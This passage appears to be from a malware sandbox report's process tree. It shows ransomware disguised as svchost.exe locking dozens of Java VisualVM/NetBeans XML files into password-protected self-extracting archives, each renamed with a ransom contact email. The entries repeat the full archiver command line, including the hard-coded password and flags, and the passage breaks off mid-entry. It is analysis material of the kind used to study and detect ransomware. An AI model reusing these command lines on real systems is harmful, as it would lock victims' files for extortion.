  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-outline.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-outline.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2092
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-plaf.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-plaf.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  PID:1928
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-tabcontrol.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-tabcontrol.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1700
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-actions.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-actions.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2712
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-awt.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-awt.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:796
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-compat.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-compat.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:3020
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-dialogs.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-dialogs.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1628
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-execution.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-execution.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1876
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-explorer.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-explorer.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1776
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-io.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-io.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1636
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-loaders.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-loaders.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2028
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-nodes.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-nodes.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1680
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-options.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-options.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2104
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-text.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-text.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1860
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-util-enumerations.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-util-enumerations.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1264
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-windows.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-windows.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1968
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-annotations-common.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-annotations-common.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2408
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-progress.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-progress.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1764
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-search.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-search.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2744
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-visual.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-visual.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1872
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-bootstrap.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-bootstrap.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2588
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-execution.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-execution.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2844
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-io-ui.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-io-ui.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2700
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-multitabs.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-multitabs.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2888
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-multiview.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-multiview.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2428
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-output2.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-output2.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1964
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-startup.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-startup.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1980
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-ui.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-ui.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2352
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-windows.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-windows.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1672
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1376
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-lib-uihandler.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-lib-uihandler.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1028
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-applemenu.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-applemenu.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1236
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-cli.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-cli.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:676
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-services.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-services.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1540
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-ui.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-ui.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1016
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-core-kit.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-core-kit.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1348
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-editor-mimelookup-impl.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-editor-mimelookup-impl.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1992
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-editor-mimelookup.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-editor-mimelookup.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2336
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-favorites.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-favorites.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:768
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-javahelp.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-javahelp.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2032
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring-fallback.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring-fallback.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1592
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring-impl.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring-impl.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2100
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1564
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-masterfs-nio2.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-masterfs-nio2.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:808
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-masterfs.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-masterfs.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:568
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-options-api.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-options-api.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2464
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-options-keymap.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-options-keymap.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1580
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-print.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-print.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1092
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-progress-ui.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-progress-ui.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1876
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-queries.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-queries.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2024
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-sampler.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-sampler.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1032
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-sendopts.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-sendopts.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2020
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-settings.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-settings.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2920
- C:\ProgramData\msvkp\svchost.exe
